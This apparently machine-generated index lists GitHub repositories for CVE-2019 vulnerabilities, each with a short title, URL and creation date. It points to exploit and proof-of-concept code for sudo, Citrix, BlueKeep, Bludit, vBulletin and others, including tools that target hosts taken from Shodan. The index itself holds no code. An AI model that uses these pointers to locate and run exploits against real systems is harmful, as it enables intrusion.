**This is a brief exploitation of CVE-2019-14287 Sudo Security Bypass Vulnerability. ** : [ejlevin99/Sudo-Security-Bypass-Vulnerability](https://api.github.com/repos/ejlevin99/Sudo-Security-Bypass-Vulnerability) create time: 2020-05-12T14:45:54Z

**This is the exploitation of sudo security bypass vulnerability** : [thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-](https://api.github.com/repos/thinuri99/Sudo-Security-Bypass-Vulnerability-CVE-2019-14287-) create time: 2020-05-12T15:00:57Z

**SNP Assignment on a Linux vulnerability** : [Dilshan-Eranda/CVE-2019-10149](https://api.github.com/repos/Dilshan-Eranda/CVE-2019-10149) create time: 2020-05-12T15:11:54Z

**None** : [alokaranasinghe/cve-2019-11043](https://api.github.com/repos/alokaranasinghe/cve-2019-11043) create time: 2020-05-12T16:09:59Z

**Sudo Security Policy bypass Vulnerability** : [HussyCool/CVE-2019-14287-IT18030372-](https://api.github.com/repos/HussyCool/CVE-2019-14287-IT18030372-) create time: 2020-05-11T19:19:17Z

**None** : [DewmiApsara/CVE-2019-14287](https://api.github.com/repos/DewmiApsara/CVE-2019-14287) create time: 2020-05-12T16:56:59Z

**None** : [janod313/-CVE-2019-14287-SUDO-bypass-vulnerability](https://api.github.com/repos/janod313/-CVE-2019-14287-SUDO-bypass-vulnerability) create time: 2020-05-12T16:53:23Z

**CVE-2019-6111 vulnerability exploitation** : [53n7hu/SNP](https://api.github.com/repos/53n7hu/SNP) create time: 2020-05-12T17:48:26Z

**None** : [Avishka991/CVE-Privilege-Escalation-2019-13272-](https://api.github.com/repos/Avishka991/CVE-Privilege-Escalation-2019-13272-) create time: 2020-05-12T18:00:34Z

**This document explain Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway [CVE-2019-19781]** : [Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201](https://api.github.com/repos/Roshi99/Remote-Code-Execution-Exploit-for-Citrix-Application-Delivery-Controller-and-Citrix-Gateway-CVE-201) create time: 2020-05-12T18:10:19Z

**Local Root vulnerability- CVE-2019-13272 / Security Bypass Vulnerability – CVE-2019-14287/Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538** : [Tharana/vulnerability-exploitation](https://api.github.com/repos/Tharana/vulnerability-exploitation) create time: 2020-05-12T17:59:48Z

**None** : [ducnp/CVE-2019-CONF](https://api.github.com/repos/ducnp/CVE-2019-CONF) create time: 2020-05-12T18:06:48Z

**None** : [sanjana123-cloud/CVE-2019-18683](https://api.github.com/repos/sanjana123-cloud/CVE-2019-18683) create time: 2020-05-12T18:31:36Z

**USB device fuzzing on Android Phone** : [parallelbeings/CVE-2019-14079](https://api.github.com/repos/parallelbeings/CVE-2019-14079) create time: 2020-04-05T05:45:29Z

**None** : [Thathsarani24/CVE2019-13272](https://api.github.com/repos/Thathsarani24/CVE2019-13272) create time: 2020-05-12T21:40:43Z

**None** : [teddy47/CVE-2019-13272---Documentation](https://api.github.com/repos/teddy47/CVE-2019-13272---Documentation) create time: 2020-05-13T03:28:45Z

**None** : [stevenseeley/HowCVE-2019-1083Works](https://api.github.com/repos/stevenseeley/HowCVE-2019-1083Works) create time: 2020-05-13T18:17:19Z

**None** : [BBRathnayaka/POC-CVE-2019-5736](https://api.github.com/repos/BBRathnayaka/POC-CVE-2019-5736) create time: 2020-05-10T04:49:28Z

**ES File Explorer Open Port Vulnerability - CVE-2019-6447** : [SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447](https://api.github.com/repos/SandaRuFdo/ES-File-Explorer-Open-Port-Vulnerability---CVE-2019-6447) create time: 2020-05-14T13:22:54Z

**Bolt-cms 3.6.10 Csrf -> xss -> rce** : [r3m0t3nu11/CVE-2019-1759-csrf-js-rce](https://api.github.com/repos/r3m0t3nu11/CVE-2019-1759-csrf-js-rce) create time: 2020-05-15T10:54:20Z

**Heap corruption in WhatsApp's media picker** : [NatleoJ/CVE-2019-11933](https://api.github.com/repos/NatleoJ/CVE-2019-11933) create time: 2019-11-05T04:38:26Z

**None** : [AndreyChertckov/django_cve_2019_19844_poc](https://api.github.com/repos/AndreyChertckov/django_cve_2019_19844_poc) create time: 2020-05-21T10:03:27Z

**CVE-2019-8656 GateKeeper Bypass** : [D00MFist/CVE-2019-8656](https://api.github.com/repos/D00MFist/CVE-2019-8656) create time: 2020-05-21T22:41:59Z

**vulnerabilidad CVE-2019-0708 testing y explotacion ** : [nochemax/bLuEkEeP-GUI](https://api.github.com/repos/nochemax/bLuEkEeP-GUI) create time: 2020-05-23T20:15:29Z

**QNAP pre-auth root RCE Exploit (CVE-2019-7192 ~ CVE-2019-7195)** : [th3gundy/CVE-2019-7192_QNAP_Exploit](https://api.github.com/repos/th3gundy/CVE-2019-7192_QNAP_Exploit) create time: 2020-05-24T15:44:29Z

**This repository provides a dockerized infrastructure and a python implementation of the CVE-2019-11043 exploit.** : [kriskhub/CVE-2019-11043](https://api.github.com/repos/kriskhub/CVE-2019-11043) create time: 2020-05-05T09:43:44Z

**TelerikUI Vulnerability Scanner (CVE-2019-18935)** : [ThanHuuTuan/Telerik_CVE-2019-18935](https://api.github.com/repos/ThanHuuTuan/Telerik_CVE-2019-18935) create time: 2020-05-25T08:37:51Z

**None** : [yukar1z0e/CVE-2019-19781](https://api.github.com/repos/yukar1z0e/CVE-2019-19781) create time: 2020-05-26T08:00:22Z

**The reproduction code for CVE-2019-8641.** : [chia33164/CVE-2019-8641-reproduction](https://api.github.com/repos/chia33164/CVE-2019-8641-reproduction) create time: 2020-05-29T07:37:15Z

**This project for CVE-2019-18935** : [ThanHuuTuan/CVE_2019_18935](https://api.github.com/repos/ThanHuuTuan/CVE_2019_18935) create time: 2020-05-29T07:29:52Z

**DVR-HACKING-HACK4LX** : [attakercyebr/hack4lx_CVE-2018-2019](https://api.github.com/repos/attakercyebr/hack4lx_CVE-2018-2019) create time: 2019-04-25T09:19:42Z

**POC for CVE-2019-7616 / ESA-2019-09** : [random-robbie/CVE-2019-7616](https://api.github.com/repos/random-robbie/CVE-2019-7616) create time: 2020-06-02T07:28:13Z

**None** : [ynots0ups/CVE-2019-16113](https://api.github.com/repos/ynots0ups/CVE-2019-16113) create time: 2020-06-03T15:49:41Z

**Proof of Concept for CVE-2019-18634** : [saleemrashid/sudo-cve-2019-18634](https://api.github.com/repos/saleemrashid/sudo-cve-2019-18634) create time: 2020-02-07T18:07:03Z

**CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate** : [cybervaca/CVE-2019-16113](https://api.github.com/repos/cybervaca/CVE-2019-16113) create time: 2020-06-04T16:06:44Z

**Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)** : [hg8/CVE-2019-16113-PoC](https://api.github.com/repos/hg8/CVE-2019-16113-PoC) create time: 2020-06-09T12:39:10Z

**Key Negotiation Of Bluetooth (KNOB) attacks on Bluetooth BR/EDR and BLE [CVE-2019-9506]** : [francozappa/knob](https://api.github.com/repos/francozappa/knob) create time: 2019-08-15T11:54:21Z

**Drupal8's REST RCE, SA-CORE-2019-003, CVE-2019-6340** : [jas502n/CVE-2019-6340](https://api.github.com/repos/jas502n/CVE-2019-6340) create time: 2019-05-27T19:06:14Z

**Full exploit chain (CVE-2019-11708 & CVE-2019-9810) against Firefox on Windows 64-bit.** : [0vercl0k/CVE-2019-11708](https://api.github.com/repos/0vercl0k/CVE-2019-11708) create time: 2019-09-29T07:08:52Z

**CVE-2019-0708 - BlueKeep (RDP)** : [umarfarook882/CVE-2019-0708](https://api.github.com/repos/umarfarook882/CVE-2019-0708) create time: 2019-05-31T17:37:26Z

**None** : [r00t4dm/CVE-2019-17570](https://api.github.com/repos/r00t4dm/CVE-2019-17570) create time: 2020-01-19T02:57:26Z

**CVE-2019-17570 details and proof of concept** : [orangecertcc/xmlrpc-common-deserialization](https://api.github.com/repos/orangecertcc/xmlrpc-common-deserialization) create time: 2020-01-24T11:32:18Z

**CVE-2019-12384 漏洞测试环境** : [MagicZer0/Jackson_RCE-CVE-2019-12384](https://api.github.com/repos/MagicZer0/Jackson_RCE-CVE-2019-12384) create time: 2019-07-26T03:24:38Z

**Collection of information and files for the demonstration along with working PoC of CVE-2019-15813.** : [iamhrishikeshpadhye/CVE-2019-15813-Exploitation](https://api.github.com/repos/iamhrishikeshpadhye/CVE-2019-15813-Exploitation) create time: 2020-06-12T15:05:33Z

**CVE-2019-5736 POCs** : [twistlock/RunC-CVE-2019-5736](https://api.github.com/repos/twistlock/RunC-CVE-2019-5736) create time: 2019-02-20T12:23:13Z

**None** : [xxg141/Silent-JPG-Exploit-CVE-2019](https://api.github.com/repos/xxg141/Silent-JPG-Exploit-CVE-2019) create time: 2020-06-08T15:19:50Z

**Bludit 3.9.2 - bruteforce bypass - CVE-2019-17240** : [LucaReggiannini/Bludit-3-9-2-bb](https://api.github.com/repos/LucaReggiannini/Bludit-3-9-2-bb) create time: 2020-06-24T22:08:55Z

**RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)** : [mpgn/Rails-doubletap-RCE](https://api.github.com/repos/mpgn/Rails-doubletap-RCE) create time: 2019-03-23T02:52:31Z

**None** : [ReverseBrain/CVE-2019-18988](https://api.github.com/repos/ReverseBrain/CVE-2019-18988) create time: 2020-07-01T09:56:29Z

**Try to reproduce this issue with Docker** : [matinciel/Wordpress_CVE-2019-9787](https://api.github.com/repos/matinciel/Wordpress_CVE-2019-9787) create time: 2020-05-19T22:09:43Z

**None** : [TheRook/AudioCaptchaBypass-CVE-2008-2019](https://api.github.com/repos/TheRook/AudioCaptchaBypass-CVE-2008-2019) create time: 2020-07-02T20:04:05Z

**None** : [Kenun99/CVE-2019-16113-Dockerfile](https://api.github.com/repos/Kenun99/CVE-2019-16113-Dockerfile) create time: 2020-07-03T08:37:43Z

**PHP-FPM Remote Code Execution Vulnerability (CVE-2019-11043) POC in Python** : [AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-](https://api.github.com/repos/AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-) create time: 2019-10-24T05:28:41Z

**CVE-2019-0708 (BlueKeep)** : [worawit/CVE-2019-0708](https://api.github.com/repos/worawit/CVE-2019-0708) create time: 2019-12-07T10:13:11Z

**Apache Solr远程代码执行漏洞(CVE-2019-0193) Exploit** : [1135/solr_exploit](https://api.github.com/repos/1135/solr_exploit) create time: 2019-08-12T07:17:21Z

**None** : [Harish4948/CVE_2019_15813-lab](https://api.github.com/repos/Harish4948/CVE_2019_15813-lab) create time: 2020-07-08T08:50:22Z

**None** : [SharpHack/CVE-2019-19781](https://api.github.com/repos/SharpHack/CVE-2019-19781) create time: 2020-07-09T05:17:07Z

**修改的poc,适用于python3** : [qiong-qi/CVE-2019-19781-poc](https://api.github.com/repos/qiong-qi/CVE-2019-19781-poc) create time: 2020-07-09T14:26:02Z

**Prueba de CVE-2019-1351** : [JonasDL/PruebaCVE20191351](https://api.github.com/repos/JonasDL/PruebaCVE20191351) create time: 2020-07-13T00:33:43Z

**TeamViewer Store Credentials Decryption** : [mr-r3b00t/CVE-2019-18988](https://api.github.com/repos/mr-r3b00t/CVE-2019-18988) create time: 2020-07-13T15:30:02Z

**quick and dirty PHP RCE proof of concept** : [corifeo/CVE-2019-11043](https://api.github.com/repos/corifeo/CVE-2019-11043) create time: 2020-07-13T16:32:15Z

**Bash Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2003 up to Windows Server 2019.** : [tinkersec/cve-2020-1350](https://api.github.com/repos/tinkersec/cve-2020-1350) create time: 2020-07-14T22:45:48Z

**CVE-2019-0708** : [lwtz/CVE-2019-0708](https://api.github.com/repos/lwtz/CVE-2019-0708) create time: 2019-11-17T03:28:28Z

**None** : [qianshuidewajueji/CVE-2019-0887](https://api.github.com/repos/qianshuidewajueji/CVE-2019-0887) create time: 2020-07-19T12:03:44Z

**My working exploit script for Shitrix (CVE-2019-19781)** : [Jabo-SCO/Shitrix-CVE-2019-19781](https://api.github.com/repos/Jabo-SCO/Shitrix-CVE-2019-19781) create time: 2020-01-12T18:53:29Z

**Citrix Unauthorized Remote Code Execution Attacker - CVE-2019-19781** : [w4fz5uck5/CVE-2019-19781-CitrixRCE](https://api.github.com/repos/w4fz5uck5/CVE-2019-19781-CitrixRCE) create time: 2020-07-17T11:52:36Z

**Explotation framework for CVE-2019-11687** : [kosmokato/bad-dicom](https://api.github.com/repos/kosmokato/bad-dicom) create time: 2019-12-15T08:52:17Z

**Sudo Security Bypass (CVE-2019-14287)** : [shallvhack/Sudo-Security-Bypass-CVE-2019-14287](https://api.github.com/repos/shallvhack/Sudo-Security-Bypass-CVE-2019-14287) create time: 2019-10-18T04:11:14Z

**PoC for CVE-2019-16113 which affects Bludit, a flat-file CMS.** : [west-tek/CVE-2019-16113-PoC](https://api.github.com/repos/west-tek/CVE-2019-16113-PoC) create time: 2020-07-26T04:47:41Z

**Pulse Secure SSL VPN exploit (CVE-2019-11510) using hosts retrieved from Shodan API.** : [andripwn/pulse-exploit](https://api.github.com/repos/andripwn/pulse-exploit) create time: 2020-07-27T15:06:08Z

**Citrix ADC scanner (CVE-2019-19781) using hosts retrieved from Shodan API.** : [andripwn/CVE-2019-19781](https://api.github.com/repos/andripwn/CVE-2019-19781) create time: 2020-07-27T15:09:51Z

**Better version of rastating.github.io/bludit-brute-force-mitigation-bypass/** : [triple-octopus/Bludit-CVE-2019-17240-Fork](https://api.github.com/repos/triple-octopus/Bludit-CVE-2019-17240-Fork) create time: 2020-07-28T12:36:34Z

**Shitrix : CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit ** : [VladRico/CVE-2019-19781](https://api.github.com/repos/VladRico/CVE-2019-19781) create time: 2020-07-30T17:37:40Z

**POC scanner for the Grafana vulnerability CVE-2019-15043** : [h0ffayyy/CVE-2019-15043](https://api.github.com/repos/h0ffayyy/CVE-2019-15043) create time: 2020-08-01T21:31:46Z

**Solr_CVE-2019-17558** : [gsheller/Solr_CVE-2019-17558](https://api.github.com/repos/gsheller/Solr_CVE-2019-17558) create time: 2020-08-04T06:13:33Z

**Exploit code for CVE-2019-2729** : [waffl3ss/CVE-2019-2729](https://api.github.com/repos/waffl3ss/CVE-2019-2729) create time: 2020-01-09T22:27:36Z

**win32k** : [DreamoneOnly/CVE-2019-0623-32-exp](https://api.github.com/repos/DreamoneOnly/CVE-2019-0623-32-exp) create time: 2020-05-26T13:14:17Z

**None** : [DreamoneOnly/CVE-2019-1458-malware](https://api.github.com/repos/DreamoneOnly/CVE-2019-1458-malware) create time: 2020-05-17T13:35:48Z

**None** : [DreamoneOnly/CVE-2019-0808-32-64-exp](https://api.github.com/repos/DreamoneOnly/CVE-2019-0808-32-64-exp) create time: 2020-05-17T13:13:15Z

**Triggering and Analyzing Android Kernel Vulnerability CVE-2019-2215** : [sharif-dev/AndroidKernelVulnerability](https://api.github.com/repos/sharif-dev/AndroidKernelVulnerability) create time: 2020-06-07T15:03:07Z

**Full exploit for D-Link DCS-5020L, POC crash for others that are vulnerable as well. ** : [tacnetsol/CVE-2019-10999](https://api.github.com/repos/tacnetsol/CVE-2019-10999) create time: 2019-01-23T14:53:19Z

**CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2019-2890漏洞POC** : [zhzhdoai/Weblogic_Vuln](https://api.github.com/repos/zhzhdoai/Weblogic_Vuln) create time: 2020-08-10T09:17:04Z

**CVE-2019-16759 vbulletin 5.0.0 till 5.5.4 pre-auth rce** : [theLSA/vbulletin5-rce](https://api.github.com/repos/theLSA/vbulletin5-rce) create time: 2019-10-02T16:46:43Z

**Webmin <=1.920 RCE** : [ruthvikvegunta/CVE-2019-15107](https://api.github.com/repos/ruthvikvegunta/CVE-2019-15107) create time: 2020-08-08T10:17:03Z

**Ldap Injection in PegaSystem 8.2 or less** : [IAG0110/CVE-2019-16374](https://api.github.com/repos/IAG0110/CVE-2019-16374) create time: 2020-08-12T16:06:59Z

**None** : [jd-961/CVE-2019-16759-bypass](https://api.github.com/repos/jd-961/CVE-2019-16759-bypass) create time: 2020-08-12T16:18:14Z

**S2-059 CVE-2019-0230** : [gitworldhero/CVE-2019-0230](https://api.github.com/repos/gitworldhero/CVE-2019-0230) create time: 2020-08-13T12:59:23Z

**CVE-2019-0230 Exploit** : [A2gel/CVE-2019-0230](https://api.github.com/repos/A2gel/CVE-2019-0230) create time: 2020-08-13T13:05:36Z

**Modero AMX Code Execution (CVE-2019–11224) ** : [Insecurities/CVE-2019-11224](https://api.github.com/repos/Insecurities/CVE-2019-11224) create time: 2020-08-13T19:07:36Z

**This tools will extracts and dumps Email + SMTP from vBulletin database server** : [mas1337/CVE-2019-16759](https://api.github.com/repos/mas1337/CVE-2019-16759) create time: 2020-08-16T18:17:33Z

**Speculative Load Hazards Boost Rowhammer and Cache Attacks - CVE-2019-0162 - ** : [saadislamm/SPOILER](https://api.github.com/repos/saadislamm/SPOILER) create time: 2020-08-17T02:30:51Z

**Create an exploit to libssh2 vulnerabulity described in CVE-2019-13115** : [viz27/Libssh2-Exploit](https://api.github.com/repos/viz27/Libssh2-Exploit) create time: 2019-10-03T17:26:08Z

**An experimental script PoC for Kr00k vulnerability (CVE-2019-15126)** : [akabe1/kr00ker](https://api.github.com/repos/akabe1/kr00ker) create time: 2020-03-18T16:25:28Z

**This utility can help determine if indicators of compromise (IOCs) exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510.** : [cisagov/check-your-pulse](https://api.github.com/repos/cisagov/check-your-pulse) create time: 2020-04-16T16:32:47Z

**None** : [starling021/CVE-2019-11932-SupportApp](https://api.github.com/repos/starling021/CVE-2019-11932-SupportApp) create time: 2020-08-20T02:45:40Z

**php-fpm+Nginx RCE** : [jas502n/CVE-2019-11043](https://api.github.com/repos/jas502n/CVE-2019-11043) create time: 2019-10-23T23:26:57Z

**CVE-2019-0230 Exploit POC** : [PrinceFPF/CVE-2019-0230](https://api.github.com/repos/PrinceFPF/CVE-2019-0230) create time: 2020-08-13T15:18:32Z

**CVE-2019-0230 & s2-059 poc.** : [ramoncjs3/CVE-2019-0230](https://api.github.com/repos/ramoncjs3/CVE-2019-0230) create time: 2020-08-20T08:21:54Z

**Telerik UI for ASP.NET AJAX File upload and .NET deserialisation exploit (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)** : [bao7uo/RAU_crypto](https://api.github.com/repos/bao7uo/RAU_crypto) create time: 2018-01-09T13:53:57Z

**None** : [sunian19/CVE-2019-16759](https://api.github.com/repos/sunian19/CVE-2019-16759) create time: 2020-08-24T16:15:10Z

**[CVE-2019-18935] Telerik UI for ASP.NET AJAX (RadAsyncUpload Handler) .NET JSON Deserialization** : [murataydemir/CVE-2019-18935](https://api.github.com/repos/murataydemir/CVE-2019-18935) create time: 2020-08-19T17:11:02Z

**None** : [lcartey/proftpd-cve-2019-12815](https://api.github.com/repos/lcartey/proftpd-cve-2019-12815) create time: 2020-08-25T13:58:38Z

**An exploit for CVE-2019-17026. It pops xcalc and was tested on Ubuntu (x64).** : [maxpl0it/CVE-2019-17026-Exploit](https://api.github.com/repos/maxpl0it/CVE-2019-17026-Exploit) create time: 2020-08-27T19:32:07Z

**Vbulletin RCE Exploit** : [nako48/CVE-2019-16759](https://api.github.com/repos/nako48/CVE-2019-16759) create time: 2020-08-13T19:11:37Z

**CVE-2019-2525 / CVE-2019-2548** : [wotmd/VirtualBox-6.0.0-Exploit-1-day](https://api.github.com/repos/wotmd/VirtualBox-6.0.0-Exploit-1-day) create time: 2019-08-03T12:25:41Z

**Bludit Exploitation Via upload Image.php ** : [itsjeffersonli/CVE-2019-16113](https://api.github.com/repos/itsjeffersonli/CVE-2019-16113) create time: 2020-07-17T13:37:20Z

**Vbulletin RCE Exploits** : [apidotmy/CVE-2019-16759](https://api.github.com/repos/apidotmy/CVE-2019-16759) create time: 2020-09-06T21:55:58Z

**None** : [apidotmy/CVE-2019](https://api.github.com/repos/apidotmy/CVE-2019) create time: 2020-09-06T22:09:14Z

**None** : [Hacker-Yadav/CVE-2019-11932](https://api.github.com/repos/Hacker-Yadav/CVE-2019-11932) create time: 2020-09-12T07:18:57Z

**My first zero day.** : [Crystalware/CVE-2019-13600](https://api.github.com/repos/Crystalware/CVE-2019-13600) create time: 2020-09-12T21:25:14Z

**Checker for QNAP pre-auth root RCE (CVE-2019-7192 ~ CVE-2019-7195)** : [cycraft-corp/cve-2019-7192-check](https://api.github.com/repos/cycraft-corp/cve-2019-7192-check) create time: 2020-05-21T09:14:28Z

**Proof of calc for CVE-2019-6453** : [andripwn/mIRC-CVE-2019-6453](https://api.github.com/repos/andripwn/mIRC-CVE-2019-6453) create time: 2019-07-18T20:40:09Z

**Scanner PoC for CVE-2019-0708 RDP RCE vuln** : [andripwn/CVE-2019-0708](https://api.github.com/repos/andripwn/CVE-2019-0708) create time: 2019-07-18T20:53:54Z

**PoC for CVE-2019-19844 ( https://www.djangoproject.com/weblog/2019/dec/18/security-releases/ )** : [andripwn/django_cve201919844](https://api.github.com/repos/andripwn/django_cve201919844) create time: 2019-12-25T10:05:48Z

**Identify vulnerable (RCE) vBulletin 5.0.0 - 5.5.4 instances using Shodan (CVE-2019-16759)** : [andripwn/pwn-vbulletin](https://api.github.com/repos/andripwn/pwn-vbulletin) create time: 2019-12-29T18:49:15Z

**This is the exploit of CVE-2019-17240. ** : [pingport80/CVE-2019-17240](https://api.github.com/repos/pingport80/CVE-2019-17240) create time: 2020-06-08T15:05:24Z

**CVE-2019-18935** : [random-robbie/CVE-2019-18935](https://api.github.com/repos/random-robbie/CVE-2019-18935) create time: 2020-09-30T10:00:16Z

**None** : [miguelhamal/CVE-2019-19393](https://api.github.com/repos/miguelhamal/CVE-2019-19393) create time: 2020-09-30T15:21:48Z

**CVE-2019-3396 confluence SSTI RCE** : [Yt1g3r/CVE-2019-3396_EXP](https://api.github.com/repos/Yt1g3r/CVE-2019-3396_EXP) create time: 2019-04-10T02:15:47Z

**This is a Automated Generate Payload for CVE-2019-11932 (WhatsApp Remote Code Execution)** : [KeepWannabe/WhatsRCE](https://api.github.com/repos/KeepWannabe/WhatsRCE) create time: 2019-10-04T13:45:44Z

**Java反序列化漏洞利用工具V1.0 Java反序列化相关漏洞的检查工具,采用JDK 1.8+NetBeans8.2开发,软件运行必须安装JDK 1.8或者以上版本。 支持:weblogic xml反序列化漏洞 CVE-2017-10271/CNVD-C-2019-48814/CVE-2019-2725检查。** : [shack2/javaserializetools](https://api.github.com/repos/shack2/javaserializetools) create time: 2018-09-13T09:44:18Z

**Scripts to verify and execute CVE-2019-14287 as part of Research** : [M108Falcon/Sudo-CVE-2019-14287](https://api.github.com/repos/M108Falcon/Sudo-CVE-2019-14287) create time: 2020-09-18T06:10:35Z

**None** : [intellee/CVE-2019-1477](https://api.github.com/repos/intellee/CVE-2019-1477) create time: 2020-10-09T07:33:44Z

**Bludit 3.9.2 - Remote command execution - CVE-2019-16113** : [noroh4xy/CVE-2019-16113](https://api.github.com/repos/noroh4xy/CVE-2019-16113) create time: 2020-10-03T21:38:39Z

**A docker-contained koseven hello world to play with SQL injection CVE-2019-8979 affecting versions < 3.3.10** : [seb-elttam/ko7demo](https://api.github.com/repos/seb-elttam/ko7demo) create time: 2020-10-11T06:23:24Z

**Environment for CVE_2019_17571** : [Al1ex/CVE_2019_17571](https://api.github.com/repos/Al1ex/CVE_2019_17571) create time: 2020-07-16T04:01:40Z

**CVE-2019-10172 PoC and Possible mitigations** : [rusakovichma/CVE-2019-10172](https://api.github.com/repos/rusakovichma/CVE-2019-10172) create time: 2020-10-14T12:00:20Z

**CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920** : [squid22/Webmin_CVE-2019-15107](https://api.github.com/repos/squid22/Webmin_CVE-2019-15107) create time: 2020-10-15T14:53:48Z

**None** : [Security-AVS/CVE-2019-13633](https://api.github.com/repos/Security-AVS/CVE-2019-13633) create time: 2020-10-15T15:19:58Z

**CVE-2019-17240 - Bludit 3.9.2 Authentication Bypass** : [noroh4xy/CVE-2019-17240](https://api.github.com/repos/noroh4xy/CVE-2019-17240) create time: 2020-09-29T13:51:39Z

**Exploits CuteNews 2.1.2 via poor file upload checks used when uploading an avatar image leading to RCE.** : [mt-code/CVE-2019-11447](https://api.github.com/repos/mt-code/CVE-2019-11447) create time: 2020-10-18T13:49:55Z

**Data Collection Related to Exim CVE-2019-10149** : [area1/exim-cve-2019-10149-data](https://api.github.com/repos/area1/exim-cve-2019-10149-data) create time: 2020-06-03T02:27:01Z

**None** : [luuquy/DecryptRawdata_CVE_2019_18935](https://api.github.com/repos/luuquy/DecryptRawdata_CVE_2019_18935) create time: 2020-10-21T09:43:12Z

**None** : [Elsfa7-110/CVE-2019-1579](https://api.github.com/repos/Elsfa7-110/CVE-2019-1579) create time: 2020-10-21T12:30:42Z

**PoC for apache struts 2 vuln cve-2019-0230** : [f8al/CVE-2019-0230-PoC](https://api.github.com/repos/f8al/CVE-2019-0230-PoC) create time: 2020-10-22T17:55:10Z

**Simple tool for testing vulnerability to CVE 2019-19781** : [LeapBeyond/cve_2019_19781](https://api.github.com/repos/LeapBeyond/cve_2019_19781) create time: 2020-01-16T17:43:38Z

**Test a host for susceptibility to CVE-2019-19781** : [cisagov/check-cve-2019-19781](https://api.github.com/repos/cisagov/check-cve-2019-19781) create time: 2020-01-11T00:26:16Z

**Bludit <= 3.9.2 - Authentication Bruteforce Mitigation Bypass Exploit/PoC** : [ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass](https://api.github.com/repos/ColdFusionX/CVE-2019-17240_Bludit-BF-Bypass) create time: 2020-10-21T10:13:51Z

**None** : [bobfuzzer/CVE-2019-18885](https://api.github.com/repos/bobfuzzer/CVE-2019-18885) create time: 2019-11-12T05:50:00Z

**CVE-2019-12836** : [9lyph/CVE-2019-12836](https://api.github.com/repos/9lyph/CVE-2019-12836) create time: 2019-06-16T04:41:29Z

**This script checks the Citrix Netscaler if it has been compromised by CVE-2019-19781 attacks and collects all file system information** : [DanielWep/CVE-NetScalerFileSystemCheck](https://api.github.com/repos/DanielWep/CVE-NetScalerFileSystemCheck) create time: 2020-01-16T08:52:14Z

**PoC for old Binder vulnerability (based on P0 exploit)** : [c3r34lk1ll3r/CVE-2019-2215](https://api.github.com/repos/c3r34lk1ll3r/CVE-2019-2215) create time: 2020-10-27T14:43:17Z

**GCHQ Stroom is vulnerable to Cross-Site Scripting due to the ability to load the Stroom dashboard on another site and insufficient protection against window event origins.** : [RepublicR0K/CVE-2019-10779](https://api.github.com/repos/RepublicR0K/CVE-2019-10779) create time: 2020-10-29T21:56:32Z

**CuteNews Avatar 2.1.2 Remote Code Execution Vulnerability** : [khuntor/CVE-2019-11447-EXP](https://api.github.com/repos/khuntor/CVE-2019-11447-EXP) create time: 2020-10-30T08:21:46Z

**Solr RCE CVE-2019-17558** : [pan3a/Solr-CVE-2019-17558](https://api.github.com/repos/pan3a/Solr-CVE-2019-17558) create time: 2020-10-30T16:57:43Z

**CVE-2019-2107** : [marcinguy/CVE-2019-2107](https://api.github.com/repos/marcinguy/CVE-2019-2107) create time: 2019-07-08T14:18:33Z

**None** : [ngpentest007/CVE-2019-7356](https://api.github.com/repos/ngpentest007/CVE-2019-7356) create time: 2020-11-03T07:04:15Z

**None** : [pwn3z/CVE-2019-11510-PulseVPN](https://api.github.com/repos/pwn3z/CVE-2019-11510-PulseVPN) create time: 2020-09-17T17:53:56Z

**None** : [AaronWilsonGrylls/CVE-2019-0708-POC](https://api.github.com/repos/AaronWilsonGrylls/CVE-2019-0708-POC) create time: 2020-11-06T07:13:30Z

**(CVE-2019-6340, CVE-2018-7600) drupal8-REST-RCE ** : [ludy-dev/drupal8-REST-RCE](https://api.github.com/repos/ludy-dev/drupal8-REST-RCE) create time: 2020-08-31T22:55:18Z

**(CVE-2019-2725) Oracle WLS(Weblogic) RCE test sciript** : [ludy-dev/Oracle-WLS-Weblogic-RCE](https://api.github.com/repos/ludy-dev/Oracle-WLS-Weblogic-RCE) create time: 2020-08-31T14:09:09Z

**(CVE-2019-16759) vBulletin_Routestring-RCE** : [ludy-dev/vBulletin_Routestring-RCE](https://api.github.com/repos/ludy-dev/vBulletin_Routestring-RCE) create time: 2020-08-31T13:44:15Z

**None** : [fox-it/cve-2019-1040-scanner](https://api.github.com/repos/fox-it/cve-2019-1040-scanner) create time: 2019-06-24T15:33:50Z

**None** : [ngpentest007/CVE-2019-7357](https://api.github.com/repos/ngpentest007/CVE-2019-7357) create time: 2020-11-10T06:07:42Z

**CVE-2019-0708-PoC It is a semi-functional exploit capable of remotely accessing a Windows computer by exploiting the aforementioned vulnerability, this repository also contains notes on how to complete the attack.** : [at0mik/CVE-2019-0708-PoC](https://api.github.com/repos/at0mik/CVE-2019-0708-PoC) create time: 2019-06-11T09:38:36Z

**sudo exploit for CVE-2019-18634** : [ptef/CVE-2019-18634](https://api.github.com/repos/ptef/CVE-2019-18634) create time: 2020-03-09T03:05:57Z

**Apache Tomcat CGIServlet RCE** : [0xmanjoos/CVE-2019-0232](https://api.github.com/repos/0xmanjoos/CVE-2019-0232) create time: 2020-11-12T04:06:30Z

**None** : [ORCA666/CVE-2019-0708](https://api.github.com/repos/ORCA666/CVE-2019-0708) create time: 2020-11-14T08:51:31Z

**This is a container built for demonstration purposes that has a version of the sudo command which is vulnerable to CVE-2019-14287** : [CashWilliams/CVE-2019-14287-demo](https://api.github.com/repos/CashWilliams/CVE-2019-14287-demo) create time: 2019-10-15T17:58:36Z

